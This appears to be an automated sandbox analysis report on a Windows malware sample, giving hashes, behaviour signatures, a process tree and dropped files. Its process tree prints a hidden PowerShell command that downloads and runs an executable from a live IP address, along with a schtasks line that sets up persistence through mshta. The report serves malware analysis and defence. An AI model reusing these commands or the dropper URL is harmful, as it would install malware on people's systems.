Overview

overview

10

Static

static

5

234f654f4d...13.exe

windows7-x64

10

234f654f4d...13.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-02-2025 16:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe

  • Size

    938KB

  • MD5

    75338f0061d3a9d0e9fec49eb8d394f9

  • SHA1

    bc9e82fce457c2dab9c59935d3ea978728cda650

  • SHA256

    234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13

  • SHA512

    7b7fbaa8573f5097ecd1862fc7df058e3ce2fead3ebb37033ed549902a75dcb21cc0c23668ce34ad837f8a62c1c710a0953e58b31cab8386ad1bf8bfa7400f2d

  • SSDEEP

    24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8ayrF:/TvC/MTQYxsWR7ayr

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
    "C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn d1a1lma4uQe /tr "mshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn d1a1lma4uQe /tr "mshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1072
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KXN9SZ89JSNQ0CY2EFU18QOCSUEVMGZN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzExOTk4QjAtMTRDNy00QjMyLUExOEQtRTk1REZENURFQ0NGfSIgdXNlcmlkPSJ7MDM5Qjk4MDYtRDgyMi00NjI3LUIyNUQtRDJBNzhDQTk2NzQyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7Nzk5Q0JBMDctRTI0Ni00NkFCLUE3NDQtNzA0RUNFRjMwNkQ3fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTExNTg1OTU1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:3028

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zjun0yfv.h3d.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta
    Filesize

    720B

    MD5

    9e2620a3476b0afc17e6997638032283

    SHA1

    a0633667a028a1d1943ca1e44564611706606e80

    SHA256

    167fb525a6f473ad3c625c66881bfc03aa5ea9c0500637f94c27eccc5277f018

    SHA512

    5c8bfb58153cb5b85f88d5802d5fc52928bf1279301df3184a8bc3a016c7abbc13ccb7c44f158924eb41268326d83400f4a3bb1eca1c5a073b74ba7ba0bf154c

    Download Submit

  • memory/2676-2-0x0000000004D80000-0x0000000004DB6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2676-3-0x00000000053F0000-0x0000000005A18000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2676-6-0x0000000005C90000-0x0000000005CF6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2676-16-0x0000000005D00000-0x0000000006054000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2676-5-0x0000000005C10000-0x0000000005C76000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2676-4-0x0000000005A70000-0x0000000005A92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2676-17-0x0000000006300000-0x000000000631E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2676-18-0x00000000063B0000-0x00000000063FC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2676-20-0x0000000006810000-0x000000000682A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2676-19-0x0000000007C40000-0x00000000082BA000-memory.dmp

    Filesize

    6.5MB

    Download